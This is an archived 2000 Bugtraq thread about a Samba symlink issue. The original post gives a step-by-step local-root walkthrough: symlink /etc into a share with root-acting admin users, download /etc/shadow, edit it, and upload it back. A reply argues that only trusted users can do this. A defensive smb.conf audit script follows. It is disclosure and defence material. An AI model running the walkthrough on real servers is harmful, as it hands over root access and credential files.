5860519 2000-12-14 00:17 +0100  /89 lines/ Tozz <tozz@HACKERS4HACKERS.ORG>
Sent by: joel@lysator.liu.se
Imported: 2000-12-14  23:48  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: tozz@HACKERS4HACKERS.ORG
Recipient: Bugtraq (import) <14223>
Subject: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
------------------------------------------------------------
From: Tozz <tozz@HACKERS4HACKERS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <002a01c0655a$eae19c10$0100000a@loesje>

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
=================================================================

Requirements:

* Shell access or any other way to create symlinks
* A running samba daemon
* The username and/or password of a user named in the
  admin lists in one or more shares.
* Brains are not required.

By default, Samba (http://www.samba.org) follows symlinks, which can
lead to root compromise. Here is an example:

I have a guy that sorts out all my uploads through SMB, he has 'admin'
access (admin users = username).. This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf

[uploads]
 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Log in to the shell, or find some other way to create symlinks,
and create a symlink in /home/ftp/incoming.
You do something like:

ln /etc -s

Now type on your box (local or remote both work):
smbclient //foobar.com/uploads -U warezmaster
It will ask for a password, enter it and you will get something like

smb: \>

There we go

smb: \> cd etc
smb: \> get shadow
smb: \> exit

[root@embrace /root]
Now you have downloaded the shadow file to your local box.
Edit it: change your UID to 0, or remove the password
from the root account (no password required at logon).

Log in with smbclient again

smbclient //foobar.com/uploads -U warezmaster
and enter the password

and reupload

smb: \> cd etc
smb: \> put shadow
smb: \> exit

That's it. Now log in to the shell: if you changed your own UID
you are now root. If you removed the password from the root account,
just su to it and you won't need a password.

Note:

The 'Follow Symlinks' option can be turned off, but it's on by default.


Fix:

Disable Follow Symlinks


Bye,
Tozz (tozz@hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org, channel #axenet).
Nickname: Tozz, or MemoServ me when I'm not online.
(5860519) --------------------------------(Reflowed)
Comment in text 5864613 by Jeffrey W. Baker <jwbaker@ACM.ORG>
5864613 2000-12-14 15:23 -0800  /55 lines/ Jeffrey W. Baker <jwbaker@ACM.ORG>
Sent by: joel@lysator.liu.se
Imported: 2000-12-15  21:32  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jwbaker@ACM.ORG
Recipient: Bugtraq (import) <14234>
Comment on text 5860519 by Tozz <tozz@HACKERS4HACKERS.ORG>
Subject: Re: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
------------------------------------------------------------
From: "Jeffrey W. Baker" <jwbaker@ACM.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.31.0012141519570.224-100000@heat.dci>

On Thu, 14 Dec 2000, Tozz wrote:

> Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
> =================================================================
>
> Requirements:
>
> * Shell access or any other way to create symlinks
> * A running samba daemon
> * The username and/or password of a user named in the
>   admin lists in one or more shares.
> * Brains are not required.

This is really well documented, and comes as no surprise to an
educated Samba user.  In order for your "exploit" to actually work,
the administrator must have granted a person "admin user" privileges,
after having read this in the documentation:

              This  is a list of users who will be granted admin-
              istrative privileges on the share. This means  that
              they  will do all file operations as the super-user
              (root).

              You should use this option very carefully,  as  any
              user  in this list will be able to do anything they
              like on the share,  irrespective  of  file  permis-
              sions.

and this:

              This parameter allows the  Samba  administrator  to
              stop  smbd  from following symbolic links in a par-
              ticular share. Setting this parameter to "No"  pre-
              vents any file or directory that is a symbolic link
              from being followed (the user will get  an  error).
              This  option  is  very  useful  to  stop users from
              adding a symbolic link to /etc/passwd in their home
              directory for instance.  However it will slow file-
              name lookups down slightly.

Well shit, Wally, I guess we had better not give admin privs to
untrusted people.

The bottom line is that to execute this exploit, you must be trusted
by the administrator, and thus you could probably get blanket sudo if
you wanted it anyway.

-jwb
(5864613) --------------------------------(Reflowed)
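The thread above turns on two smb.conf parameters: the `admin users` list in Tozz's [uploads] share, which makes those users operate as root, and the `follow symlinks` parameter quoted from the documentation in Baker's reply. The following Python is an added example, written for this archive page and not code from Samba or from either poster. It reads a constructed smb.conf (the [uploads] share copied from the post, plus a [docs] share with `follow symlinks = no` applied and a [public] share with no admin users), reports shares where a root-acting user can reach files outside the share through a symlink, and rebuilds the `ln -s /etc` situation inside a temporary directory to show why a realpath-based containment check, rather than a lexical path check, is what keeps a symlink from leaving the share. The default values assumed for `follow symlinks` and `wide links` (both yes) are those of the thread's era; later Samba releases changed the `wide links` default to no, so treat the defaults as an assumption to adjust for your release.

```python
"""Added example (not Samba's code, not from either post): audit an smb.conf for
the combination the thread describes, a share whose `admin users` act as root
while symlinks are followed, and show the path-containment check that
`follow symlinks = no` amounts to on the filesystem side."""
import os
import tempfile

# Constructed smb.conf: [uploads] is the share from the original post,
# [docs] is the same share with the fix applied, [public] has no admin users.
SAMPLE_SMB_CONF = """
[global]
 workgroup = EXAMPLE

[uploads]
 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

[docs]
 path = /srv/docs
 admin users = warezmaster
 follow symlinks = no

[public]
 path = /srv/public
 read only = yes
"""


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {parameter: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def samba_bool(value, default):
    """Samba accepts yes/true/1 and no/false/0; an unset parameter takes its default."""
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def audit(sections):
    """Return [(share, reason)] for shares where admin users (who act as root) can
    reach files outside the share path through a symlink. Assumed defaults: both
    `follow symlinks` and `wide links` are yes, as in the thread's era; later
    Samba releases default `wide links` to no, so adjust for your release."""
    findings = []
    for share, params in sections.items():
        if share == "global":
            continue
        admins = params.get("admin users", "").replace(",", " ").split()
        follow = samba_bool(params.get("follow symlinks"), default=True)
        wide = samba_bool(params.get("wide links"), default=True)
        if admins and follow and wide:
            findings.append((share, f"admin users {admins} act as root and "
                                    "symlinks leaving the share are followed"))
    return findings


def is_within_share(share_root, requested):
    """Resolve symlinks first, then require the real target to stay under the
    real share root. A lexical check on the joined path would accept the symlink."""
    root = os.path.realpath(share_root)
    target = os.path.realpath(os.path.join(share_root, requested))
    return target == root or target.startswith(root + os.sep)


def demo_symlink_escape():
    """Rebuild the post's `ln /etc -s` inside a throwaway temp dir (constructed;
    nothing outside the temp dir is touched) and compare the two checks.
    Returns (naive_path_exists, containment_on_symlink, containment_on_plain_file)."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "incoming")
        outside = os.path.join(tmp, "etc")  # stands in for the real /etc
        os.makedirs(share)
        os.makedirs(outside)
        with open(os.path.join(outside, "shadow"), "w") as f:
            f.write("placeholder\n")
        os.symlink(outside, os.path.join(share, "etc"))  # the symlink from the post
        naive = os.path.exists(os.path.join(share, "etc", "shadow"))
        return naive, is_within_share(share, "etc/shadow"), is_within_share(share, "README")


if __name__ == "__main__":
    for share, reason in audit(parse_smb_conf(SAMPLE_SMB_CONF)):
        print(f"[{share}] {reason}")
    print(demo_symlink_escape())
```

Run as-is it flags only [uploads]; the [docs] share is silent because `follow symlinks = no` is set, and [public] because nobody acts as root there. `demo_symlink_escape()` returns `(True, False, True)`: the file is reachable through the symlink by a plain existence check, the containment check rejects it, and an ordinary file inside the share still passes.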